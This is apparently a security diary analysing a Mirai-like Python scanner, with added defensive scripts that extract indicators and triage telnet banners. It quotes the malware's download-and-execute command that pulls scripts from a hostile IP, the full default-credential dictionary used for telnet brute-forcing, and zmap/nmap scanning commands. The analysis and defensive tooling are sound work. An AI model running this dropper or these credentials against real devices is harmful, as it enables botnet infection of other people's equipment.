Mirai-alike Python Scanner
Last week, I found an interesting Python script that behaves like a Mirai bot[1]. It scans the Internet for devices exposing their telnet (TCP/23) interface, then tries to connect using a dictionary of credentials. The script has been uploaded to VirusTotal and has a low score of 2/59[2]. Indeed, it does not contain suspicious strings or API calls: just a simple but powerful scanner.
Here are the commands injected when a device is found with vulnerable credentials:
rekdevice = "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.148.10.84/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 45.148.10.84 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 45.148.10.84; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 45.148.10.84 ftp1.sh ftp1.sh; sh ftp1.sh tftp1.sh tftp2.sh ftp1.sh" #command to send
The IP address 45.148.10.84 is offline at the moment but already has a bad reputation and is present in multiple blocklists.
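As an added example (not part of the diary and not code from the scanner), here is a small Python parser that takes the rekdevice command above apart into its stages and pulls out what a defender wants from it: the download host, the dropped file names, the files that get executed and the staging directories to hunt in on a suspect device. The command string embedded in it is the one quoted above. The argument handling for tftp and ftpget follows the busybox-style invocations seen in that string (tftp HOST -c get FILE, tftp -r FILE -g HOST, ftpget ... HOST LOCAL REMOTE) and is an assumption, not a general parser for those tools.

```python
"""Pull indicators out of a Mirai-style stage-one command.

Added example; not code from the diary or from the scanner it describes.
The command below is the 'rekdevice' string quoted in the diary. Argument
handling for tftp/ftpget follows the busybox invocations seen in that string
and is an assumption, not a general parser for those tools.
"""
import re
import shlex
from urllib.parse import urlparse

REKDEVICE = (
    "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; "
    "wget http://45.148.10.84/bins.sh; chmod 777 bins.sh; sh bins.sh; "
    "tftp 45.148.10.84 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; "
    "tftp -r tftp2.sh -g 45.148.10.84; chmod 777 tftp2.sh; sh tftp2.sh; "
    "ftpget -v -u anonymous -p anonymous -P 21 45.148.10.84 ftp1.sh ftp1.sh; "
    "sh ftp1.sh tftp1.sh tftp2.sh ftp1.sh"
)

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def split_stages(cmd):
    """Split the one-liner on ';' and '||' into individual commands."""
    return [s for s in re.split(r"\s*(?:;|\|\|)\s*", cmd) if s]


def parse_fetch(argv):
    """Describe a download stage (wget/tftp/ftpget) or return None."""
    tool = argv[0]
    if tool == "wget":
        url = next((a for a in argv[1:] if "://" in a), None)
        if url is None:
            return None
        return {"tool": tool, "host": urlparse(url).hostname,
                "file": url.rsplit("/", 1)[-1], "url": url}
    if tool == "tftp":
        # busybox form: tftp HOST -c get FILE ; netkit form: tftp -r FILE -g HOST
        if "-r" in argv:
            fname = argv[argv.index("-r") + 1]
        elif "get" in argv:
            fname = argv[argv.index("get") + 1]
        else:
            return None
        m = IPV4_RE.search(" ".join(argv))
        host = m.group(0) if m else None
        return {"tool": tool, "host": host, "file": fname,
                "url": f"tftp://{host}/{fname}"}
    if tool == "ftpget":
        # busybox form: ftpget [-u USER -p PASS -P PORT] HOST LOCAL_FILE REMOTE_FILE
        idx = next((i for i, a in enumerate(argv) if IPV4_RE.fullmatch(a)), None)
        if idx is None or idx + 2 >= len(argv):
            return None
        return {"tool": tool, "host": argv[idx], "file": argv[idx + 1],
                "url": f"ftp://{argv[idx]}/{argv[idx + 2]}"}
    return None


def extract_iocs(cmd):
    """Return hosts, URLs, dropped files, executed files and staging dirs."""
    fetches, executed, staging = [], [], []
    for stage in split_stages(cmd):
        argv = shlex.split(stage)
        if not argv:
            continue
        if argv[0] == "cd" and len(argv) > 1:
            # the 'cd a || cd b' chain tells you where the dropper lands
            staging.append(argv[1])
        elif argv[0] == "sh":
            # anything passed to sh is a file worth hunting for on disk
            for f in argv[1:]:
                if f not in executed:
                    executed.append(f)
        else:
            fetch = parse_fetch(argv)
            if fetch:
                fetches.append(fetch)
    return {
        "hosts": sorted({f["host"] for f in fetches if f["host"]}),
        "urls": [f["url"] for f in fetches],
        "files": [f["file"] for f in fetches],
        "executed": executed,
        "staging_dirs": staging,
        "fetches": fetches,
    }


if __name__ == "__main__":
    for key, value in extract_iocs(REKDEVICE).items():
        if key != "fetches":
            print(f"{key}: {value}")
```

The hosts list feeds a blocklist or a firewall/IDS rule, the file names and staging directories give you something concrete to check on a device you suspect was hit, and the per-stage dictionaries keep the protocol so you can tell which of HTTP, TFTP or FTP egress actually got through.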
Here is the list of credential pairs tested:
combo = [ "root:root", "root:", "admin:admin", "telnet:telnet", "support:support", "user:user", "admin:", "admin:password", "root:vizxv", "root:admin", "root:xc3511", "root:888888", "root:xmhdipc", "root:default", "root:juantech", "root:123456", "root:54321", "root:12345", "root:pass", "ubnt:ubnt", "root:klv1234", "root:Zte521", "root:hi3518", "root:jvbzd", "root:anko", "root:zlxx.", "root:7ujMko0vizxv", "root:7ujMko0admin", "root:system", "root:ikwb", "root:dreambox", "root:user", "root:realtek", "root:00000000", "admin:1111111", "admin:1234", "admin:12345", "admin:54321", "admin:123456", "admin:7ujMko0admin", "admin:1234", "admin:pass", "admin:meinsm", "admin:admin1234", "root:1111", "admin:smcadmin", "admin:1111", "root:666666", "root:password", "root:1234", "root:klv123", "Administrator:admin", "service:service", "supervisor:supervisor", "guest:guest", "guest:12345", "guest:12345", "admin1:password", "administrator:1234", "666666:666666", "888888:888888", "tech:tech", "mother:fucker" ]
The script is pretty well written and is multi-threaded to speed up the scan:
import threading

# start 'threads' worker threads; worker() is defined elsewhere in the script
for l in xrange(threads):
    try:
        t = threading.Thread(target=worker)
        t.start()
    except:
        pass
The script does not implement a random IP address generator; it just uses the zmap[3] scanner:
zmap -p23 -N 10000 -f saddr -q --verbosity=0
This command will return 10000 IP addresses that expose a telnet port.
The question that arises when you find this kind of script is: "Can we really find so many devices exposing a telnet interface in the wild in 2020?". I did my own test and launched the above zmap command. In a few seconds, 10K IP addresses were returned. Then, I used the nmap scanner with the 'banner' script to grab telnet banners:
nmap -sC --script=banner -p 23 -Pn -iL open-telnet.txt -oA telnet-banners -v -n
I found a lot of banners that disclose the type of device (routers, WiFi access points, switches, VoIP gateways, IoT, ...). More interestingly, I found some devices still bricked by BrickerBot:
# telnet x.x.x.x
Trying x.x.x.x...
Connected to x.x.x.x.
Escape character is '^]'.
Internet Chemotherapy Part 11 - BrickerBot (TM) Source Drop (7/31 2020):
hxxp://depastedihrn3jtw[.]onion/show.php?md5=20735856837081a18e6f0edf2c1e8d76
Internet Chemotherapy Part 12 - Third Time is the Charm? (9/6 2020)
hxxp://depastedihrn3jtw[.]onion/show.php?md5=4c17df6b30ed2704082465d9a1c4ea86
DeepPaste is temperamental (unreachable 75% of time) so if the links are not loading then try again later.
Update 10/3: So I have been looking into reconditioning Tenda/Intelbras, Genexis and Zte routers.. Still WIP but seen some positive impact over the last few days/weeks.
Update 10/6: ..and Totolink..
10/9: some new tricks for netis, TVT and Tata Consulting.. what next?
Update 10/17: Getting in the Zhone.. seeing real IoT action in 2020 at last
(none) login:
I found plenty of notifications and disclaimers warning you that connecting to the device is prohibited, that your IP will be logged, etc. Please don't waste your time implementing such useless banners; just get rid of telnet!
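To turn the nmap run above into something you can act on, here is an added example (not from the diary) in Python that reads the XML report nmap writes with -oA (telnet-banners.xml for the command above), extracts the banner script output for every host with an open port 23 and sorts the hosts into rough buckets: bricked by BrickerBot, a banner that discloses the device type, a legal notice only, or no banner at all. The XML embedded below is constructed sample input using documentation addresses, not real scan data, and the keyword lists are an assumption that you would extend from your own results.

```python
"""Triage telnet banners from an nmap XML report.

Added example; not code from the diary. It reads the XML nmap writes for the
'banner' script (telnet-banners.xml when run with -oA telnet-banners as in
the diary) and buckets open-telnet hosts. SAMPLE_XML is constructed sample
input with documentation addresses, not real scan data; the keyword rules
are a starting point, not a complete classifier.
"""
import re
import xml.etree.ElementTree as ET

# constructed sample of the structure nmap emits: one <host> per address,
# the banner script output sits in the 'output' attribute of <script>
SAMPLE_XML = r"""<nmaprun scanner="nmap">
  <host><address addr="192.0.2.10" addrtype="ipv4"/><ports>
    <port protocol="tcp" portid="23"><state state="open"/><service name="telnet"/>
      <script id="banner" output="Internet Chemotherapy Part 11 - BrickerBot (TM) Source Drop\x0D\x0A(none) login:"/>
    </port></ports></host>
  <host><address addr="192.0.2.11" addrtype="ipv4"/><ports>
    <port protocol="tcp" portid="23"><state state="open"/><service name="telnet"/>
      <script id="banner" output="\xFF\xFB\x01\xFF\xFB\x03BusyBox DSL Router\x0D\x0Alogin:"/>
    </port></ports></host>
  <host><address addr="192.0.2.12" addrtype="ipv4"/><ports>
    <port protocol="tcp" portid="23"><state state="open"/><service name="telnet"/>
      <script id="banner" output="WARNING: Unauthorized access is prohibited. Your IP address has been logged.\x0D\x0Alogin:"/>
    </port></ports></host>
  <host><address addr="192.0.2.13" addrtype="ipv4"/><ports>
    <port protocol="tcp" portid="23"><state state="filtered"/><service name="telnet"/></port>
  </ports></host>
  <host><address addr="192.0.2.14" addrtype="ipv4"/><ports>
    <port protocol="tcp" portid="23"><state state="open"/><service name="telnet"/></port>
  </ports></host>
</nmaprun>
"""

# order matters: the BrickerBot text also mentions routers, so test it first
RULES = [
    ("bricked-brickerbot", re.compile(r"brickerbot|internet chemotherapy", re.I)),
    ("device-banner", re.compile(r"router|switch|access point|voip|gateway|busybox|modem", re.I)),
    ("legal-notice", re.compile(r"unauthori[sz]ed|prohibited|monitored|prosecut", re.I)),
]


def unescape_banner(raw):
    """Decode nmap's \\xHH escapes, then drop telnet IAC bytes and controls."""
    decoded = re.sub(r"\\x([0-9A-Fa-f]{2})",
                     lambda m: chr(int(m.group(1), 16)), raw)
    return re.sub(r"[^\x09\x0A\x0D\x20-\x7E]", "", decoded)


def parse_banners(xml_text):
    """Yield (address, banner) for every host with an open TCP/23."""
    root = ET.fromstring(xml_text)
    results = []
    for host in root.iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        for port in host.iter("port"):
            state = port.find("state")
            if port.get("portid") != "23" or state is None or state.get("state") != "open":
                continue
            script = port.find("script[@id='banner']")
            banner = script.get("output", "") if script is not None else ""
            results.append((addr.get("addr"), unescape_banner(banner)))
    return results


def classify(banner):
    """Map a cleaned banner to one of the buckets above."""
    if not banner.strip():
        return "no-banner"
    for label, rx in RULES:
        if rx.search(banner):
            return label
    return "unknown"


def triage(xml_text):
    """Return {bucket: [addresses]} for an nmap XML report."""
    summary = {}
    for addr, banner in parse_banners(xml_text):
        summary.setdefault(classify(banner), []).append(addr)
    return summary


if __name__ == "__main__":
    for bucket, hosts in triage(SAMPLE_XML).items():
        print(f"{bucket}: {', '.join(hosts)}")
```

Filtered or closed ports are skipped, so only hosts that actually answered on telnet end up in a bucket; the device-banner bucket is the one that matters for the diary's point, since those hosts hand an attacker the device type before any login attempt.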
[1] https://www.cyber.nj.gov/threat-center/threat-profiles/botnet-variants/mirai-botnet
[2] https://www.virustotal.com/gui/file/89daf232e0658103883fa05b8968093675b5aa4b6be3fdbd46757144095daf64/details
[3] https://github.com/zmap/zmap
Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant